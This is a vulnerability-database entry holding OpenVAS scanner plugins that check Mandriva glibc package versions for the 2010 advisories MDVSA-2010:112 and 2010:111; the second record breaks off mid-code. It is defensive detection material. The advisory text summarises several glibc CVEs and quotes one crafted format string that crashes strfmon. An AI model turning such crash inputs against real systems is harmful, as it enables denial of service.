ID OPENVAS:1361412562310831068 Type openvas Reporter Copyright (c) 2010 Greenbone Networks GmbH Modified 2017-12-22T00:00:00
Description
Check for the Version of glibc
###############################################################################
# OpenVAS Vulnerability Test
#
# Mandriva Update for glibc MDVSA-2010:112 (glibc)
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
include("revisions-lib.inc");
tag_insight = "Multiple vulnerabilities was discovered and fixed in glibc:
Multiple integer overflows in the strfmon implementation in
the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow
context-dependent attackers to cause a denial of service (memory
consumption or application crash) via a crafted format string, as
demonstrated by a crafted first argument to the money_format function
in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).
nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6)
2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the
passwd.adjunct.byname map to entries in the passwd map, which allows
remote attackers to obtain the encrypted passwords of NIS accounts
by calling the getpwnam function (CVE-2010-0015).
The encode_name macro in misc/mntent_r.c in the GNU C Library (aka
glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs,
does not properly handle newline characters in mountpoint names, which
allows local users to cause a denial of service (mtab corruption),
or possibly modify mount options and gain privileges, via a crafted
mount request (CVE-2010-0296).
Integer signedness error in the elf_get_dynamic_info function
in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or
libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows
user-assisted remote attackers to execute arbitrary code via a crafted
ELF program with a negative value for a certain d_tag structure member
in the ELF header (CVE-2010-0830).
The updated packages have been patched to correct these issues.";
tag_solution = "Please Install the Updated Packages.";
tag_affected = "glibc on Mandriva Linux 2010.0,
Mandriva Linux 2010.0/X86_64";
if(description)
{
script_xref(name : "URL" , value : "http://lists.mandriva.com/security-announce/2010-06/msg00006.php");
script_oid("1.3.6.1.4.1.25623.1.0.831068");
script_version("$Revision: 8228 $");
script_tag(name:"last_modification", value:"$Date: 2017-12-22 08:29:52 +0100 (Fri, 22 Dec 2017) $");
script_tag(name:"creation_date", value:"2010-06-11 13:46:51 +0200 (Fri, 11 Jun 2010)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_xref(name: "MDVSA", value: "2010:112");
script_cve_id("CVE-2008-1391", "CVE-2009-4880", "CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830");
script_name("Mandriva Update for glibc MDVSA-2010:112 (glibc)");
script_tag(name: "summary" , value: "Check for the Version of glibc");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
script_family("Mandrake Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/mandriva_mandrake_linux", "ssh/login/release");
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("pkg-lib-rpm.inc");
release = get_kb_item("ssh/login/release");
res = "";
if(release == NULL){
exit(0);
}
if(release == "MNDK_2010.0")
{
if ((res = isrpmvuln(pkg:"glibc", rpm:"glibc~2.10.1~6.5mnb2", rls:"MNDK_2010.0")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"glibc-devel", rpm:"glibc-devel~2.10.1~6.5mnb2", rls:"MNDK_2010.0")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"glibc-doc", rpm:"glibc-doc~2.10.1~6.5mnb2", rls:"MNDK_2010.0")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"glibc-doc-pdf", rpm:"glibc-doc-pdf~2.10.1~6.5mnb2", rls:"MNDK_2010.0")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"glibc-i18ndata", rpm:"glibc-i18ndata~2.10.1~6.5mnb2", rls:"MNDK_2010.0")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"glibc-profile", rpm:"glibc-profile~2.10.1~6.5mnb2", rls:"MNDK_2010.0")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"glibc-static-devel", rpm:"glibc-static-devel~2.10.1~6.5mnb2", rls:"MNDK_2010.0")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"glibc-utils", rpm:"glibc-utils~2.10.1~6.5mnb2", rls:"MNDK_2010.0")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"nscd", rpm:"nscd~2.10.1~6.5mnb2", rls:"MNDK_2010.0")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99); # Not vulnerable.
exit(0);
}
{"id": "OPENVAS:1361412562310831068", "type": "openvas", "bulletinFamily": "scanner", "title": "Mandriva Update for glibc MDVSA-2010:112 (glibc)", "description": "Check for the Version of glibc", "published": "2010-06-11T00:00:00", "modified": "2017-12-22T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 7.5}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831068", "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "references": ["http://lists.mandriva.com/security-announce/2010-06/msg00006.php", "2010:112"], "cvelist": ["CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "lastseen": "2018-01-02T10:54:42", "viewCount": 1, "enchantments": {"score": {"value": 8.2, "vector": "NONE", "modified": "2018-01-02T10:54:42", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["MANDRIVA_MDVSA-2010-111.NASL", "DEBIAN_DSA-2058.NASL", "SUSE_11_GLIBC-100708.NASL", "SUSE_11_GLIBC-101025.NASL", "SUSE9_12641.NASL", "SUSE_11_2_GLIBC-101027.NASL", "UBUNTU_USN-944-1.NASL", "MANDRIVA_MDVSA-2010-112.NASL", "SUSE_11_1_GLIBC-101026.NASL", "SUSE_GLIBC-7201.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:67542", "OPENVAS:1361412562310831073", "OPENVAS:831068", "OPENVAS:830967", "OPENVAS:840435", "OPENVAS:830966", "OPENVAS:1361412562310830967", "OPENVAS:831073", "OPENVAS:1361412562310830966", "OPENVAS:136141256231067542"]}, {"type": "cve", "idList": ["CVE-2009-4880", "CVE-2010-0830", "CVE-2010-0015", "CVE-2010-0296", "CVE-2008-1391"]}, {"type": "ubuntu", "idList": ["USN-944-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2058-1:F253E", "DEBIAN:DSA-1973-1:9EEF7"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8843", "SECURITYVULNS:DOC:19527", "SECURITYVULNS:DOC:22482", "SECURITYVULNS:VULN:10537", "SECURITYVULNS:DOC:23941", "SECURITYVULNS:DOC:27395", "SECURITYVULNS:VULN:10874", "SECURITYVULNS:DOC:23077"]}, {"type": "gentoo", "idList": ["GLSA-201011-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:31550", "EDB-ID:33230"]}, {"type": "seebug", "idList": ["SSV:3103"]}, {"type": "suse", "idList": ["SUSE-SA:2010:052"]}, {"type": "centos", "idList": ["CESA-2012:0126", "CESA-2011:0412", "CESA-2012:0125"]}, {"type": "redhat", "idList": ["RHSA-2011:0412", "RHSA-2012:0125", "RHSA-2012:0126"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0126", "ELSA-2011-0412", "ELSA-2012-0125"]}, {"type": "vmware", "idList": ["VMSA-2011-0010"]}], "modified": "2018-01-02T10:54:42", "rev": 2}, "vulnersScore": 8.2}, "pluginID": "1361412562310831068", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for glibc MDVSA-2010:112 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and fixed in glibc:\n\n Multiple integer overflows in the strfmon implementation in\n the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow\n context-dependent attackers to cause a denial of service (memory\n consumption or application crash) via a crafted format string, as\n demonstrated by a crafted first argument to the money_format function\n in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).\n \n nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6)\n 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the\n passwd.adjunct.byname map to entries in the passwd map, which allows\n remote attackers to obtain the encrypted passwords of NIS accounts\n by calling the getpwnam function (CVE-2010-0015).\n \n The encode_name macro in misc/mntent_r.c in the GNU C Library (aka\n glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs,\n does not properly handle newline characters in mountpoint names, which\n allows local users to cause a denial of service (mtab corruption),\n or possibly modify mount options and gain privileges, via a crafted\n mount request (CVE-2010-0296).\n \n Integer signedness error in the elf_get_dynamic_info function\n in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or\n libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows\n user-assisted remote attackers to execute arbitrary code via a crafted\n ELF program with a negative value for a certain d_tag structure member\n in the ELF header (CVE-2010-0830).\n \n The updated packages have been patched to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"glibc on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-06/msg00006.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831068\");\n script_version(\"$Revision: 8228 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 08:29:52 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-11 13:46:51 +0200 (Fri, 11 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:112\");\n script_cve_id(\"CVE-2008-1391\", \"CVE-2009-4880\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_name(\"Mandriva Update for glibc MDVSA-2010:112 (glibc)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc\", rpm:\"glibc-doc~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc-pdf\", rpm:\"glibc-doc-pdf~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static-devel\", rpm:\"glibc-static-devel~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "naslFamily": "Mandrake Local Security Checks"}
{"openvas": [{"lastseen": "2017-12-14T11:48:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "description": "Check for the Version of glibc", "modified": "2017-12-13T00:00:00", "published": "2010-06-11T00:00:00", "id": "OPENVAS:831068", "href": "http://plugins.openvas.org/nasl.php?oid=831068", "type": "openvas", "title": "Mandriva Update for glibc MDVSA-2010:112 (glibc)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for glibc MDVSA-2010:112 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and fixed in glibc:\n\n Multiple integer overflows in the strfmon implementation in\n the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow\n context-dependent attackers to cause a denial of service (memory\n consumption or application crash) via a crafted format string, as\n demonstrated by a crafted first argument to the money_format function\n in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).\n \n nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6)\n 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the\n passwd.adjunct.byname map to entries in the passwd map, which allows\n remote attackers to obtain the encrypted passwords of NIS accounts\n by calling the getpwnam function (CVE-2010-0015).\n \n The encode_name macro in misc/mntent_r.c in the GNU C Library (aka\n glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs,\n does not properly handle newline characters in mountpoint names, which\n allows local users to cause a denial of service (mtab corruption),\n or possibly modify mount options and gain privileges, via a crafted\n mount request (CVE-2010-0296).\n \n Integer signedness error in the elf_get_dynamic_info function\n in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or\n libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows\n user-assisted remote attackers to execute arbitrary code via a crafted\n ELF program with a negative value for a certain d_tag structure member\n in the ELF header (CVE-2010-0830).\n \n The updated packages have been patched to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"glibc on Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-06/msg00006.php\");\n script_id(831068);\n script_version(\"$Revision: 8092 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-13 07:31:16 +0100 (Wed, 13 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-11 13:46:51 +0200 (Fri, 11 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:112\");\n script_cve_id(\"CVE-2008-1391\", \"CVE-2009-4880\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_name(\"Mandriva Update for glibc MDVSA-2010:112 (glibc)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc\", rpm:\"glibc-doc~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc-pdf\", rpm:\"glibc-doc-pdf~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static-devel\", rpm:\"glibc-static-devel~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.10.1~6.5mnb2\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-11T11:04:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0015", "CVE-2009-4881", "CVE-2010-0296", "CVE-2010-0830", "CVE-2009-4880", "CVE-2008-1391"], "description": "Check for the Version of glibc", "modified": "2018-01-10T00:00:00", "published": "2010-06-11T00:00:00", "id": "OPENVAS:1361412562310831073", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831073", "type": "openvas", "title": "Mandriva Update for glibc MDVSA-2010:111 (glibc)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for glibc MDVSA-2010:111 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities was discovered and fixed in glibc:\n\n Multiple integer overflows in the strfmon implementation in\n the GNU C Library (aka glibc or libc6) 2.10.1 and earlier allow\n context-dependent attackers to cause a denial of service (memory\n consumption or application crash) via a crafted format string, as\n demonstrated by a crafted first argument to the money_format function\n in PHP, a related issue to CVE-2008-1391 (CVE-2009-4880).\n \n Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c\n in the strfmon implementation in the GNU C Library (aka glibc or\n libc6) before 2.10.1 allows context-dependent attackers to cause a\n denial of service (application crash) via a crafted format string,\n as demonstrated by the %99999999999999999999n string, a related issue\n to CVE-2008-1391 (CVE-2009-4881).\n \n nis/nss_nis/nis-pwd.c in the GNU C Library (aka glibc or libc6)\n 2.7 and Embedded GLIBC (EGLIBC) 2.10.2 adds information from the\n passwd.adjunct.byname map to entries in the passwd map, which allows\n remote attackers to obtain the encrypted passwords of NIS accounts\n by calling the getpwnam function (CVE-2010-0015).\n \n The encode_name macro in misc/mntent_r.c in the GNU C Library (aka\n glibc or libc6) 2.11.1 and earlier, as used by ncpmount and mount.cifs,\n does not properly handle newline characters in mountpoint names, which\n allows local users to cause a denial of service (mtab corruption),\n or possibly modify mount options and gain privileges, via a crafted\n mount request (CVE-2010-0296).\n \n Integer signedness error in the elf_get_dynamic_info function\n in elf/dynamic-link.h in ld.so in the GNU C Library (aka glibc or\n libc6) 2.0.1 through 2.11.1, when the --verify option is used, allows\n user-assisted remote attackers to execute arbitrary code via a crafted\n ELF program with a negative value for a certain d_tag structure member\n in the ELF header (CVE-2010-0830).\n \n Packages for 2008.0 and 2009.0 are provided as of the Extended\n Maintenance Program. Please visit this link to learn more:\n http://store.mandriva.com/product_info.php?cPath=149&products_id=490\n \n The updated packages have been patched to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"glibc on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-06/msg00005.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831073\");\n script_version(\"$Revision: 8356 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 09:00:39 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-11 13:46:51 +0200 (Fri, 11 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:111\");\n script_cve_id(\"CVE-2008-1391\", \"CVE-2009-4880\", \"CVE-2009-4881\", \"CVE-2010-0015\", \"CVE-2010-0296\", \"CVE-2010-0830\");\n script_name(\"Mandriva Update for glibc MDVSA-2010:111 (glibc)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc\", rpm:\"glibc-doc~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc-pdf\", rpm:\"glibc-doc-pdf~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static-devel\", rpm:\"glibc-static-devel~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.6.1~4.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc\", rpm:\"glibc-doc~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-doc-pdf\", rpm:\"glibc-doc-pdf~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.8~1.20080520.5.5mnb2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static-devel\", rpm:\"glibc-static-devel~2.8~1.20080520.5.5mnb2\", 